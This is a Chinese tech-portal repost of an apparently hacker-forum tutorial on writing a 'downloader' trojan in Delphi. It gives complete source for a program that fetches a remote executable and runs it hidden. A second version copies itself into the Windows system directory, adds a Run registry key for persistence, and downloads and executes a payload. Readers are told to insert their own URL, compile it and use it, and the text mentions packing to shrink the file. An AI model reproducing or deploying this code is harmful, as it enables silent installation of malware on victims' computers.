科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道编写自己的潜入者个人版之基础篇

编写自己的潜入者个人版之基础篇

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

没有人说编程~小弟就慢慢演示打造一个个人完美版的"潜入者"的方法

作者:黑客基地 来源:黑客基地 2008年6月10日

关键字: 黑客 网吧 网吧黑客

  • 评论
  • 分享微博
  • 分享邮件

没有人说编程~小弟就慢慢演示打造一个个人完美版的"潜入者"的方法
先从基础开始~
其他不多说了~那别人的程序改造太累~
自己写~方便
这里写个最简单的"潜入者"
原理如下
下载文件运行~查找函数库
找到两个函数(这次写的下载者就两个函数)
urlmon.pas->UrlDownloadToFile
Windows.pas->Winexec(应该很熟悉吧)
这次我们就用这两个函数搞定任务!

CODE

program Downloader;

uses
Windows,Urlmon;

begin
if URLDownloadToFile(nil, 'http://www.pysky.net/Test.exe', 'Test.exe', 0, nil) = S_OK then winexec('Test.exe',0);
end.

先下载http://www.pysky.net/Test.exe保存到当前目录为Test.exe
然后调用winexec函数运行Test.exe~Winexec后面的参数0=隐藏运行(可以隐藏程序界面)1=标准运行(就是运行了~嘻嘻)
好了把上面的下载地址改成你的就OK了~自己编译一下~就可以拿去用了~
生成文件8.5K用FSG压缩乘4K(潜入者是用MASM写的~葛军不会汇编的~所以不是她写的~)
编写潜入者个人版之二by HEART篇
将讲述如何给基础版下载者添加~系统启动运行和关联exe文件运行(蔬菜的史来姆号称可以传染exe文件其实是就是关联exe文件~没有什么特别的地方!)和如何将自身复制到安全的目录内运行(最安全的地方当然就是~~system目录了~嘻嘻~~)

基础版的生成器我就不写了~等到我讲到~~完美版的时候再作吧~这个例子只要大家了解原理就可以了~当然提供的代码完全可用

---------------------------------------------------------------------------------------------
这个是另外一个朋友叫leun给他写的"二"

大概代码如下:

program Downloader;
uses
Windows,
registry;

const
exename ='windowsx.exe';
var

DestFile: string;

function URLDownloadToFile(Caller: cardinal; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: cardinal): Longint; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';

function GetSysDir: String; //得到系统目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;

procedure reg; //写入注册表启动项
var Reg:Tregistry;
begin
Reg:=Tregistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False);
Reg.WriteString('down',GetSysDir+exename);
Reg.CloseKey;
Reg.Free;
end;

procedure downexe;
begin
DestFile := GetSysDir() + exename;
UrlDownloadToFile(0,'http://www.163.net/down/xxx.exe',PChar(DestFile),0,0);
WinExec(PChar(DestFile),0);
end;

begin;
reg; //写启动项
downexe; //下载EXE并运行
end.

其中EXE关联不稳定,主要是关联后WINDOWS不能正常关机.我解决不了此问题,哪位dx能将它完成? ... 因为加启动项里面我用了个registry单元,程序增大至80多KB,大啊...
有其它方法加启动项不用registry.程序只有20KB内(不加壳的),暂不列出了,因为上面方法简单,容易看懂,哈哈...

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章